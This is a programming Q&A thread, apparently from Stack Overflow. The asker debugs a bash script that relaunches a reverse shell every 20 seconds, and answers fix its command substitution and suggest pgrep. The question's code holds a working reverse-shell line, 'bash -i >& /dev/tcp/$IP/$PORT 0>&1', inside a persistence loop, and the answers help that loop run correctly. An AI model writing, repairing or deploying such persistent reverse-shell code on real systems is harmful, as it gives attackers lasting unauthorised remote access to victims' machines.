# Error "Integer Expression Expected" in Bash script

Tags: linux, bash, shell, sh, ps

So, I'm trying to write a bash script to phone home with a reverse shell to a certain IP using bash if the program isn't already running. It's supposed to check every 20 seconds to see if the process is alive, and if it isn't, it'll execute the shell. However, I get the error `./ReverseShell.sh: line 9: [: ps -ef | grep "bash -i" | grep -v grep | wc -l: integer expression expected` When I attempt to execute my program. This is because I'm using -eq in my if statement. When I replace -eq with =, the program compiles, but it evaluates to 0 no matter what.

What am I doing wrong? My code is below.

```
#!/bin/bash
#A small program designed to establish and keep a reverse shell open


IP=""               #Insert your IP here
PORT=""             #Insert the Port you're listening on here. 

while(true); do
        if [ 'ps -ef | grep "bash -i" | grep -v grep | wc -l' -eq 0 ]
        then
                echo "Process not found, launching reverse shell to $IP on port $PORT"
                bash -i >& /dev/tcp/$IP/$PORT 0>&1
                sleep 20
        else
                echo "Process found, sleeping for 20 seconds..."
                ps -ef | grep "bash -i" | grep -v "grep" | wc -l
                sleep 20


        fi


done
```

Comment: Use backticks or `$(...)` not single quotes around a subcommand whose output should be substituted into the command.

Comment: BTW, you can use `pgrep` instead of writing that pipe.

Comment: You can also use the final `grep` or `pgrep` command as the condition directly: `if ps -ef | grep "bash -i" | grep -vq grep; then...` ( the `-q` option tells `grep` not to print anything, just exit successfully if it finds a (non)match) or `if pgrep -f "bash -i" >/dev/null; then...`

Answer (score 1, accepted):

There is a small change required in your code.
You have to use tilt "**`**" instead of single quotes "**''**" inside if.

```
if [ `ps -ef | grep "bash -i" | grep -v grep | wc -l`  -eq 0 ]
```

This worked for me. Hope it helps you too.

Comment: I'll suggest using $() instead of backticks for the command substitution (here you can find a longer explanation: [Why is $(...) preferred over `...` (backticks)?](http://mywiki.wooledge.org/BashFAQ/082))

Comment: Above link is a great. @cristianRamon

Answer (score 1):

Besides the typo mentioned in the comments it should be:

```
if ! pgrep -f 'bash -i' > /dev/null ; then
    echo "process not found"
else
    echo "process found"
fi
```

Since `pgrep` emits a trueish exit status if at least 1 process was found and a falseish exit status if no process was found, you can use it directly in the `if` condition. `[` (which is a command) is not required.

---

PS: Just realized that this has also been [mentioned in comments](https://stackoverflow.com/questions/48759945/error-integer-expression-expected-in-bash-script/48761648#comment84520933_48759945) an hour ago. Will keep it, because it is imo a good practice.